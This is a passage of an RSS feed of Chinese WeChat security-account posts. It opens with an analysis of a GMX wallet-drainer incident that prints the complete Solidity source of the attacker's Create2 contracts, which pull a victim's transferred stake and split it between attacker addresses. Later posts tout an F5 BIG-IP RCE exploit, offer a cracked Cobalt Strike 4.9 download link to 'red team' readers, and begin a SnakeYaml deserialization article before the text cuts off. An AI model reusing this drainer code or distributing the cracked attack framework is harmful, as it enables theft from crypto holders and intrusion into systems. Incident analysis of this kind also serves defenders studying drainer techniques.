594 529 578T487 561Q443 561 443 603Q443 622 454 636T478 657L487 662Q471 668 457 668Q445 668 434 658T419 630Q412 601 403 552T387 469T380 433Q380 431 435 431Q480 431 487 430T498 424Q499 420 496 407T491 391Q489 386 482 386T428 385H372L349 263Q301 15 282 -47Q255 -132 212 -173Q175 -205 139 -205Q107 -205 81 -186T55 -132Q55 -95 76 -78T118 -61Q162 -61 162 -103Q162 -122 151 -136T127 -157L118 -162Z"></path></g></g></g></svg></span></span>GMX after signing a `signalTransfer(address receiver)</p><h4 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 18px;"><span style="display: none;"></span>攻击链<span style="display: none;"></span></h4><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">事件hash:</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">0x0b8d095c9ee0f27362240ed3f315afa12d6f88a6a0c15b99231bc14d4dd1fb96(Txhash) Details | Arbiscan</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">攻击者通过GMX: Reward Router提取代币</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">0x4e1d6fcb620e87cedb1b67b5212a23ed1265acf4b8dcf646bc0810cfc3600260(Txhash) Details | Arbiscan</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">通过Create2预先计算的地址</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">Contract Address 0xbD2BF58Be46619B7A22cE9457e1D51A10B82EB91 | Arbiscan</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">0xbD2BF58Be46619B7A22cE9457e1D51A10B82EB91是一个预先计算的合约地址，为空合约</p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-imgfileid="100000451" data-ratio="0.4064814814814815" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=685982e2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9dOB6ib2sAp5xCibVPadyiaGYSSiacEem4YUDjicicZRu84TQicklQKictE76iaNK0718xm9aNZS6wzeUkKaNQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">作为绕过钱包安全警告，这个合约地址是在wallet drainer转移其资产时(调用 create2 之后)创建的</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">意思就是：当你同意了签名，然后这个合约才被创建，你的资产通过这个创建后的合约进行转移</p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-imgfileid="100000452" data-ratio="0.30833333333333335" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=383382eb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9dOB6ib2sAp5xCibVPadyiaGYSv0nzhAtmdfNQviacib8l5IXe6ic28VAa1qaSclqMiasn2ayy36A4sL194g%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/><figcaption style="margin-top: 5px;text-align: center;color: #888;font-size: 14px;">0x0b8d095c9ee0f27362240ed3f315afa12d6f88a6a0c15b99231bc14d4dd1fb96</figcaption></figure><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">可以看详细链路：</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">arbitrum-0x0b8d095c9ee0f27362240ed3f315afa12d6f88a6a0c15b99231bc14d4dd1fb96 | MetaSleuth</p><h4 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 18px;"><span style="display: none;"></span>攻击者合约<span style="display: none;"></span></h4><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/AYfn0IKjIINBEujcbaFFDJsLAlOMuatsgL7tUVezGxW7Zb5T9nJVibdhbXHuXvhic4ib2zqLSqS50jXBzib0J6lMuIIt09bfz5kJ/640?wx_fmt=svg&amp;from=appmsg&#34;) 10px 10px / 40px no-repeat rgb(255, 255, 255);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 15px 16px 16px;display: -webkit-box;font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size: 12px;background: rgb(255, 255, 255);border-radius: 5px;">// File: contracts/gmxUnstake.sol<br/>pragma solidity ^0.8.0;<br/>contract GmxUnstake {<br/>    address rewardRouter = 0xA906F338CB21815cBc4Bc87ace9e68c87eF8d8F1;<br/>    address stakedGmxTracker = 0x908C4D94D34924765f1eDc22A1DD098397c59dD4;<br/>    address gmxToken = 0xfc5A1A6EB076a2C7aD06eD22C90d7E710E35ad0a;<br/>    address feeAndStakedGlp = 0x1aDDD80E6039594eE970E5872D247bf0414C8903;<br/>    address rewardRouterV2 = 0xB95DB5B167D75e6d04227CfFFA61069348d271F5;<br/>    receive() external payable {}<br/>    fallback() external payable {}<br/>    modifier onlyOwner() {<br/>        require(<br/>            tx.origin == 0x0000db5c8B030ae20308ac975898E09741e70000,<br/>            &#34;Caller is not an owner&#34;<br/>        );<br/>        _;<br/>    }<br/>    function acceptTransfer(address victim) private {<br/>        (bool success, ) = (rewardRouter).call(<br/>            abi.encodeWithSignature(&#34;acceptTransfer(address)&#34;, victim)<br/>        );<br/>        require(success, &#34;Can&#39;t accept transfer&#34;);<br/>    }<br/>    function handleRewards() private {<br/>        (bool success, ) = (rewardRouter).call(<br/>            abi.encodeWithSignature(<br/>                &#34;handleRewards(bool,bool,bool,bool,bool,bool,bool)&#34;,<br/>                false,<br/>                false,<br/>                true,<br/>                false,<br/>                false,<br/>                true,<br/>                true<br/>            )<br/>        );<br/>        require(success, &#34;Can&#39;t handle rewards&#34;);<br/>    }<br/>    function unstakeGmx(<br/>        uint16 percentageForFirstAddressInBasisPoints,<br/>        address firstAddress,<br/>        address secondAddress<br/>    ) private {<br/>        (bool callSuccess, bytes memory data) = (stakedGmxTracker).call(<br/>            abi.encodeWithSignature(<br/>                &#34;depositBalances(address,address)&#34;,<br/>                address(this),<br/>                gmxToken<br/>            )<br/>        );<br/>        require(<br/>            callSuccess &amp;&amp; data.length &gt; 0,<br/>            &#34;Can&#39;t not get staked gmx amount&#34;<br/>        );<br/>        uint256 stakedGmx = abi.decode(data, (uint256));<br/>        if (stakedGmx &gt; 0) {<br/>            (bool unstakeSuccess, ) = (rewardRouter).call(<br/>                abi.encodeWithSignature(&#34;unstakeGmx(uint256)&#34;, stakedGmx)<br/>            );<br/>            require(unstakeSuccess, &#34;Can&#39;t not unstake&#34;);<br/>            uint256 gmxAmountForFirstAddress = (stakedGmx *<br/>                percentageForFirstAddressInBasisPoints) / 10000;<br/>            uint256 gmxAmountForSecondAddress = stakedGmx -<br/>                gmxAmountForFirstAddress;<br/>            if (gmxAmountForFirstAddress &gt; 0) {<br/>                (bool firstTransferSuccess, ) = gmxToken.call(<br/>                    abi.encodeWithSignature(<br/>                        &#34;transfer(address,uint256)&#34;,<br/>                        firstAddress,<br/>                        gmxAmountForFirstAddress<br/>                    )<br/>                );<br/>                require(firstTransferSuccess, &#34;First gmx transfer failed&#34;);<br/>            }<br/>            if (gmxAmountForSecondAddress &gt; 0) {<br/>                (bool secondTransferSuccess, ) = gmxToken.call(<br/>                    abi.encodeWithSignature(<br/>                        &#34;transfer(address,uint256)&#34;,<br/>                        secondAddress,<br/>                        gmxAmountForSecondAddress<br/>                    )<br/>                );<br/>                require(secondTransferSuccess, &#34;Second gmx transfer failed&#34;);<br/>            }<br/>        }<br/>    }<br/>    function unstakeGlp(uint256 lpPrice, uint256 ethPrice) private {<br/>        (bool callSuccess, bytes memory data) = (feeAndStakedGlp).call(<br/>            abi.encodeWithSignature(&#34;balanceOf(address)&#34;, address(this))<br/>        );<br/>        require(callSuccess &amp;&amp; data.length &gt; 0, &#34;Can&#39;t get glp token balance&#34;);<br/>        uint256 stakedBalance = abi.decode(data, (uint256));<br/>        if (stakedBalance &gt; 0) {<br/>            (bool unstakeSuccess, ) = (rewardRouterV2).call(<br/>                abi.encodeWithSignature(<br/>                    &#34;unstakeAndRedeemGlpETH(uint256,uint256,address)&#34;,<br/>                    stakedBalance,<br/>                    (((stakedBalance * lpPrice) / ethPrice) * 9) / 10, // Calculate the min out value + remove 10%<br/>                    address(this)<br/>                )<br/>            );<br/>            require(unstakeSuccess, &#34;Can&#39;t unstake and redeem glp ETH&#34;);<br/>        }<br/>    }<br/>    function call(<br/>        address target,<br/>        bytes calldata data,<br/>        uint256 value<br/>    ) public onlyOwner {<br/>        (bool success, bytes memory returnData) = target.call{value: value}(<br/>            data<br/>        );<br/>        require(success, string(returnData));<br/>    }<br/>    function unstake(<br/>        address victim,<br/>        uint16 percentageForFirstAddressInBasisPoints,<br/>        address firstAddress,<br/>        address secondAddress,<br/>        uint256 lpPrice,<br/>        uint256 ethPrice<br/>    ) public onlyOwner {<br/>        require(<br/>            percentageForFirstAddressInBasisPoints &lt;= 10000,<br/>            &#34;Percentage must be between 0 and 10000&#34;<br/>        );<br/>        require(<br/>            firstAddress != address(0) &amp;&amp; secondAddress != address(0),<br/>            &#34;Invalid address&#34;<br/>        );<br/>        acceptTransfer(victim);<br/>        handleRewards();<br/>        unstakeGmx(<br/>            percentageForFirstAddressInBasisPoints,<br/>            firstAddress,<br/>            secondAddress<br/>        );<br/>        unstakeGlp(lpPrice, ethPrice);<br/>        if (address(this).balance &gt; 0) {<br/>            uint256 amountForFirstAddress = (address(this).balance *<br/>                percentageForFirstAddressInBasisPoints) / 10000;<br/>            uint256 amountForSecondAddress = address(this).balance -<br/>                amountForFirstAddress;<br/>            if (amountForFirstAddress &gt; 0) {<br/>                (bool success, ) = firstAddress.call{<br/>                    value: amountForFirstAddress<br/>                }(&#34;&#34;);<br/>                require(success, &#34;First transfer failed&#34;);<br/>            }<br/>            if (amountForSecondAddress &gt; 0) {<br/>                (bool success, ) = secondAddress.call{<br/>                    value: amountForSecondAddress<br/>                }(&#34;&#34;);<br/>                require(success, &#34;Second transfer failed&#34;);<br/>            }<br/>        }<br/>    }<br/>}<br/></code></pre><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/AYfn0IKjIINBEujcbaFFDJsLAlOMuatsgL7tUVezGxW7Zb5T9nJVibdhbXHuXvhic4ib2zqLSqS50jXBzib0J6lMuIIt09bfz5kJ/640?wx_fmt=svg&amp;from=appmsg&#34;) 10px 10px / 40px no-repeat rgb(255, 255, 255);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 15px 16px 16px;display: -webkit-box;font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size: 12px;background: rgb(255, 255, 255);border-radius: 5px;">// File: contracts/gmxUnstakeCreator.sol<br/>pragma solidity ^0.8.0;<br/>contract GmxUnstakeCreator {<br/>    <br/>    function createContract(bytes32 salt) private returns (address) {<br/>        GmxUnstake _contract = new GmxUnstake{salt: salt}();<br/>        return address(_contract);<br/>    }<br/>    function getBytecode() private pure returns (bytes memory) {<br/>        bytes memory bytecode = type(GmxUnstake).creationCode;<br/>        return abi.encodePacked(bytecode);<br/>    }<br/>    function calculateAddress(bytes32 salt) public view returns (address) {<br/>        bytes32 hash = keccak256(<br/>            abi.encodePacked(<br/>                bytes1(0xff),<br/>                address(this),<br/>                salt,<br/>                keccak256(getBytecode())<br/>            )<br/>        );<br/>        return address(uint160(uint256(hash)));<br/>    }<br/>    function createAndCall(<br/>        bytes32 salt,<br/>        address victim,<br/>        uint16 percentageForFirstAddressInBasisPoints,<br/>        address firstAddress,<br/>        address secondAddress,<br/>        uint256 lpPrice,<br/>        uint256 ethPrice<br/>    ) public {<br/>        address contractAddress = createContract(salt);<br/>        bytes memory callData = abi.encodeWithSignature(<br/>            &#34;unstake(address,uint16,address,address,uint256,uint256)&#34;,<br/>            victim,<br/>            percentageForFirstAddressInBasisPoints,<br/>            firstAddress,<br/>            secondAddress,<br/>            lpPrice,<br/>            ethPrice<br/>        );<br/>        (bool success, ) = contractAddress.call(callData);<br/>        require(success, &#34;Fail&#34;);<br/>    }<br/>}<br/></code></pre><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 20px;"><span style="display: inline-block;background-image: linear-gradient(45deg, transparent 48%, rgb(37, 132, 181) 48%, rgb(37, 132, 181) 52%, transparent 52%);background-position: initial;background-size: initial;background-repeat: initial;background-attachment: initial;background-origin: initial;background-clip: initial;width: 24px;height: 24px;margin-bottom: -7px;"></span><span style="font-size: 16px;border-bottom: 1px solid rgb(37,132,181);padding: 2px 10px;color: rgb(37,132,181);">参考</span><span style="display: none;"></span></h3><blockquote data-tool="mdnice编辑器" style="font-size: 0.9em;overflow: auto;color: rgb(106, 115, 125);padding: 10px 10px 10px 20px;margin-bottom: 20px;margin-top: 20px;border-width: 1px;border-style: dashed;border-color: rgb(37, 132, 181);background-image: initial;background-position: initial;background-size: initial;background-repeat: initial;background-attachment: initial;background-origin: initial;background-clip: initial;"><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;color: black;line-height: 26px;">Wallet Drainers Starts Using Create2 Bypass Wallet Security Alert - Scam Sniffer</p><p style="font-size: 16px;padding-top: 8px;padding-bottom: 8px;color: black;line-height: 26px;">Create2 | WTF Academy</p></blockquote><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;"><span style="display: inline-block;"><span style="counter-increment: counterh2;color: rgb(159,205,208);border-bottom: 4px solid rgb(159,205,208);font-size: 18px;padding: 2px 4px;">4</span></span><span style="font-size: 18px;border-bottom: 4px solid rgb(37,132,181);padding: 2px 4px;color: rgb(37,132,181);">关于圈子</span></h2><ul data-tool="mdnice编辑器" style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">漏洞报告集锦 - 包括不限于 0day / 1day / Nday 等漏洞报告及分析</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">影响力分析与合约建议 - 针对大型事件的专业分析，提供行业领先的市场影响洞见和建议。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">实战攻防演练 - 攻防演练和渗透测试脱敏报告，经验快速学习。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">Web3安全新视角 - 深入Web3的世界，掌握最新的web3安全趋势和漏洞分析。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">源代码探索 - 探究各类系统产品的源代码，硬核提高审计能力！</section></li></ul><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img class="rich_pages wxw-img" data-imgfileid="100000450" data-ratio="1.3253333333333333" style="display: block;margin-right: auto;margin-left: auto;" data-type="png" data-w="750" src="https://wechat2rss.xlab.app/img-proxy/?k=b6c7138b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9dOB6ib2sAp5xCibVPadyiaGYSHfiblPbTpu5ammrkJrPg4mRltdxsiasd7yFpibw6ZI3DdFmpRCfm9ib1cg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></figure></section><p><br/></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247484108">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=aa0e717d&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzk0ODUxNzgyOQ%3D%3D%26mid%3D2247484108%26idx%3D1%26sn%3Daa283a0d37ebca16c3c728a99946265f%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 01 Jan 2024 12:34:00 +0800</pubDate>
    </item>
    <item>
      <title>F5 BIG-IP 远程代码执行漏洞(CVE-2023-46747)（EXP效果）</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzk0ODUxNzgyOQ==&amp;mid=2247484063&amp;idx=1&amp;sn=554ce97b833261e73edcc0d111d171e4</link>
      <description>看各大寻血猎犬已经知道这个洞了，那就发出来给大家看看这个洞真正exp是啥效果，防止被花花互联网欺骗防杠精自己</description>
      <content:encoded><![CDATA[<p>
<span>41group</span> <span>2023-10-30 11:37</span> <span style="display: inline-block;">安徽</span>
</p>

<p>看各大寻血猎犬已经知道这个洞了，那就发出来给大家看看这个洞真正exp是啥效果，防止被花花互联网欺骗防杠精自己</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=4ea7d5fd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FJfZvTUw4J9emic6suicRUGKp8cbJkQiaORamXcs1yvk6Vo6MvicP9zdaicaIb1TSLib5lwxCX8wC6t5gvApvpctibBHTA%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:宋体;">看各大寻血猎犬已经知道这个洞了，那就发出来给大家看看这个洞真正</span><span style="font-family:Calibri;">exp</span><span style="font-family:宋体;">是啥效果，</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:宋体;mso-ascii-font-family:Calibri;mso-hansi-font-family:Calibri;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;">防止被花花互联网欺骗<br/></span></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.5796296296296296" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=e51001f3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9emic6suicRUGKp8cbJkQiaORa1s7cu6c4XSdicp0jjvOO9hk3j0MUaOibrmW0NXBhGldWV26H1gPe1qXA%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.784375" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=83993380&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9emic6suicRUGKp8cbJkQiaORasMtnZDkLsN5AX8DFvKt2Ja3wr2sXEJB19iap6vVyjvejKDebly1DHhg%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;">防杠精自己看前后ip</p><p style="text-align: center;"><span style="color: rgb(255, 0, 0);">进群交流翻前面文章找wx号</span><br/><mpchecktext><br/></mpchecktext></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247484063">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=be43f6de&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzk0ODUxNzgyOQ%3D%3D%26mid%3D2247484063%26idx%3D1%26sn%3D554ce97b833261e73edcc0d111d171e4%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 30 Oct 2023 11:37:00 +0800</pubDate>
    </item>
    <item>
      <title>cs4.9最新版已破解自领</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzk0ODUxNzgyOQ==&amp;mid=2247484053&amp;idx=1&amp;sn=307e526d81b5485104e0387b6ef4008b</link>
      <description>cs4.9最新版已破解完毕，各位红队兄弟们请自取 https://www.123pan.com/s/wJAk</description>
      <content:encoded><![CDATA[<p>
<span>41group</span> <span>2023-10-09 14:39</span> <span style="display: inline-block;">安徽</span>
</p>

<p>cs4.9最新版已破解完毕，各位红队兄弟们请自取 https://www.123pan.com/s/wJAk</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=20d90dee&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FJfZvTUw4J9d9mlAJNiblsribBQ1drPZkeP6jsicIiaSOjyqXiaSubHzEOKibC6kRjoianmibC7oica6H1mbtzrvibv9z4bsQ%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p>cs4.9最新版已破解完毕，各位红队兄弟们请自取</p><p> <span style="width: auto;height: 30px;line-height: 30px;padding: 0px 40px 0px 16px;background: rgb(255, 255, 255);border-width: 1px;border-style: solid;border-color: rgb(216, 216, 216);color: rgb(133, 133, 133);font-size: 13px;display: inline-block;"><a href="https://www.123pan.com/s/wJAkjv-cQ0E3.html" target="_blank">https://www.123pan.com/s/wJAkjv-cQ0E3.html</a></span><br/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.562255285826155" data-s="300,640" style="" data-type="png" data-w="1277" src="https://wechat2rss.xlab.app/img-proxy/?k=a7e771d4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9d9mlAJNiblsribBQ1drPZkePSdczoia6q9zX28GEXpS9ABgj8CmU9IBhoThQHNr5Lx3jFPVrl195DEA%2F640%3Fwx_fmt%3Dpng"/></p><p>欢迎加群领码！！！！！！！！！</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="1.65" data-s="300,640" style="" data-type="png" data-w="540" src="https://wechat2rss.xlab.app/img-proxy/?k=8bc2444a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9d9mlAJNiblsribBQ1drPZkeP0S0krC1BSriaFzugBoShibSGgria8xnxNhJnPKyyfay16pdD9OPqP0ic8A%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247484053">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=9d5a71a8&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzk0ODUxNzgyOQ%3D%3D%26mid%3D2247484053%26idx%3D1%26sn%3D307e526d81b5485104e0387b6ef4008b%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 09 Oct 2023 14:39:00 +0800</pubDate>
    </item>
    <item>
      <title>重磅消息Cobalt Strike 4.9官方最新版</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzk0ODUxNzgyOQ==&amp;mid=2247484046&amp;idx=1&amp;sn=e31acde4c8384d364d48fe0ce31b7ccb</link>
      <description>十一结束了41也来甩重磅了！！！！！Cobalt Strike大家应该用的很多。那你的是什么版本呢？4.3？</description>
      <content:encoded><![CDATA[<p>
<span>41group</span> <span>2023-10-08 21:17</span> <span style="display: inline-block;">安徽</span>
</p>

<p>十一结束了41也来甩重磅了！！！！！Cobalt Strike大家应该用的很多。那你的是什么版本呢？4.3？</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=07d07965&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FJfZvTUw4J9dedz87UNSdgqicK6Rib3wqnQGI817jHZzkqEpuuiaNcdicHL18Smrt9FeURvtb4sBictWiaRib3ZlYLNU7g%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p>十一结束了41也来甩重磅了！！！！！<br/></p><p>Cobalt Strike大家应该用的很多。那你的是什么版本呢？4.3？4.5？</p><p>官方总算是更新到4.9。41也是不知道从哪个角落里就拿到了第一手才有了国庆后的小高潮！</p><p>直接展示：</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.2574074074074074" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=6502f676&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9dedz87UNSdgqicK6Rib3wqnQbPCwS3llQviasKlvOXIemI0MfL16TjeRIgCS3BWGMWHD6p5vlsvGdtQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5601851851851852" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=e15cb8a8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9dedz87UNSdgqicK6Rib3wqnQDvLCqpEjOutnnlXHp1oLfFUOzKLov0FXKHiaZibNuMWftAVibH1BFDwXw%2F640%3Fwx_fmt%3Dpng"/>官方4.9</p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.5555555555555556" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=a5182b0f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9dedz87UNSdgqicK6Rib3wqnQkDZdPNF9NKgV7VjzSAiaXfsa83XhI43wllXV1k1gmtKThFCribtqA9Pw%2F640%3Fwx_fmt%3Dpng"/>熟悉的结构</p><p style="text-align: center;">敬请期待破解！！！！！加w入群！wx：Mathearsion</p><p><br/></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247484046">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=ffd6d1d6&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzk0ODUxNzgyOQ%3D%3D%26mid%3D2247484046%26idx%3D1%26sn%3De31acde4c8384d364d48fe0ce31b7ccb%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Sun, 08 Oct 2023 21:17:00 +0800</pubDate>
    </item>
    <item>
      <title>SnakeYaml反序列化漏洞</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzk0ODUxNzgyOQ==&amp;mid=2247484038&amp;idx=1&amp;sn=e27947ee4f359e33ad45fbea06c555fd</link>
      <description>YAML 基本语法YAML，YAML 是&#34;YAML Ain’t a Markup Language&#34;(YAM</description>
      <content:encoded><![CDATA[<p>
原创 <span>L0ne1y</span> <span>2023-09-06 02:19</span> <span style="display: inline-block;">四川</span>
</p>

<p>YAML 基本语法YAML，YAML 是"YAML Ain’t a Markup Language"(YAM</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=43da729b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FJfZvTUw4J9fh9xqjnYrcVKX9El7sYHrECiavfOFWUPgLHlU83hVZgF0SzFiaibaovvU07I36VSG9t7hsmxNSMHyfQ%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p><span style="font-size: 20px;font-weight: bold;letter-spacing: 0.034em;">YAML 基本语法</span><br/></p><article><p><span style="font-size: 15px;"><span style="color: rgb(65, 131, 196);">YAML，</span><span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">YAML </span>是&#34;<span style="color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);">YAML Ain’t a Markup Language</span>&#34;(<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">YAML</span>不是一种标记语言)的递归缩写, 是一个可读性高、用来表达数据序列化的格式，类似于<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">XML</span>但比<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">XML</span>更简洁。</span></p><p><span style="font-size: 15px;"><span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">YAML</span>的语法和其他高级语言类似, 并且可以简单表达清单、散列表，标量等资料形态。它使用空白符号缩进和大量依赖外观的特色, 特别适合用来表达或编辑数据结构、各种配置文件、倾印调试内容、文件大纲(例如: 许多电子邮件标题格式和<span style="background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">YAML</span>非常接近).</span></p><p><span style="font-weight: bold;font-size: 18px;">格式</span></p><p><span style="font-size: 15px;"><span style="font-size: 15px;color: rgb(243, 50, 50);background-color: rgb(253, 238, 238);">YAML </span>具体使用，首先<span style="font-size: 15px;background-color: rgb(253, 238, 238);color: rgb(243, 50, 50);">YAML</span>中允许表示三种格式，分别是：常量值、对象和数组。例如:</span></p></article><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="php"><code><span class="code-snippet_outer"><span class="code-snippet__comment"># 